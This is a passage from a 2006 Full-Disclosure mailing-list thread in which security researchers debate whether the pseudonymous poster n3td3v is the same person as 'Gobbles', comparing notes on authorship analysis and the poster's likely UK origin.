algorithms. These algorithms, combined with Hushmail's unique key management system, provide unrivalled levels of security. Hushmail's encryption is automatic, transparent, and seamless - no special computer skills are required. How do I create a free Hushmail account? You can create a free Hushmail account by clicking on the following link: https://www.hushmail.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Who is n3td3v?
It's OK anybody start vulnerability research from script(php or perl), but it's not good for someone to stay at script kid level, huh? - mailto:[EMAIL PROTECTED] http://www.wang-labs.com 2006/10/21, Gadi Evron [EMAIL PROTECTED]: On Fri, 20 Oct 2006, Dr. Neal Krawetz wrote: On Fri Oct 20 15:49:53 2006, Gadi Evron wrote: Cool article, but n3td3v is not gobbles. For one, easy analysis shows he is English. Gadi. Thanks Gadi. However, I'm going to call you on this: 1. What easy analysis are you using? I listed my approaches. If you are using a different approach, I'd like to hear what it is. (I'm not trying to be argumentative -- I want to learn.) 2. You said, n3td3v is not gobbles. Do you know for a fact that n3td3v is not Gobbles Security? Or is this an interpretation? If you know for a fact, then how do you know? On 1-Sep-2006, a new person controlling the n3td3v account appeared. He is likely English/Brit (based on the topics he posted). But I did not see enough text to analyze. The older n3td3v postings were by 3 people, not one person. (And primarily by three people -- a few postings were ambiguous and could indicate more people.) 1. He speaks Real English. 2. He mentions UK currency. 3. He said as much, speaking of UK issues. 4. He gave his real name. Your analysis is amazing, and shows how these things should be done. But misses that much. Gobbles was about fun, n3td3v took himself seriously rather than just his goal of making the world a better place. Aside to that, yes, I know. But as I can't mention how, it's silly for me to stick to anything but the above. From the UK. Highly likely from the North of England or Scotland. Did you ever talk to n3td3v or ask him? Behind all that posted, he really seems like a good guy with good intentions. Your analysis really is good, but it comes to no conclusions. I want to advoid the yes he is no he isn't discussion that's to follow. View my comments as opinion. Why idolize people? Gadi. -Neal Neal Krawetz, Ph.D. Hacker Factor Solutions http://www.hackerfactor.com/ Author of Introduction to Network Security (Charles River Media, 2006) http://www.charlesriver.com/Books/BookDetail.aspx?productID=126130 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Have a Good Day ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/